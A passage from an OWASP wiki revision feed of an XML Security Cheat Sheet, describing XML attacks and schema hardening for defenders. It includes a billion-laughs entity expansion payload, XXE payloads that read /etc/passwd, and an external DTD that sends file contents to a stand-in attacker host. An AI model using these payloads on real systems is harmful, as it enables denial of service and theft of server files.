  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt; &lt;br /&gt;
&amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;&amp;amp;LOL9;&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
    &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:ENVELOPE&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, which is in fact the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;, which will be expanded within the &amp;lt;tt&amp;gt;includeme&amp;lt;/tt&amp;gt; tag. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output. &lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF ) happens when the server receives a malicious XML schema, which makes the server retrieve remote resources such as a file, a file via HTTP/HTTPS/FTP, etc. SSRF has been used to retrieve remote files, to prove a XXE when you cannot reflect back the file or perform port scanning, or perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY %xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allows for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt; which loads a remote DTD. The remote DTD should contain something like this::&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
The simplest and most unusual scenario, with complete disclosure you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports becomes quite clear.   &lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host; then analyze the average time for each port to determinate the status of each port. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI scheme. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224433</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224433"/>
				<updated>2016-12-21T20:21:14Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using not well formed documents.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities are to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coersive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closed the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and set the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10.  If the application processes only the first values provided for the id and the value without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption  some values must be encoded using base64 . This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and will consider it valid. The first portion of this data is properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are partially set for the element, which means that the information is probably tested using an application instead of the proposed sample schema. &lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Negative numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Positive numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting that &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type may allow negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. What you probably want to see in here to avoid that logical vulnerability is positiveInteger instead of integer. &lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The price value will not trigger any errors when set at Infinity or NaN, because these values will not be valid. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should only be restricted to specific sets: traffic lights will have only three types of colors, only 12 months are available, and so on. It is possible that the schema has these restrictions in place for each element or attribute. This is the most perfect whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element month to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
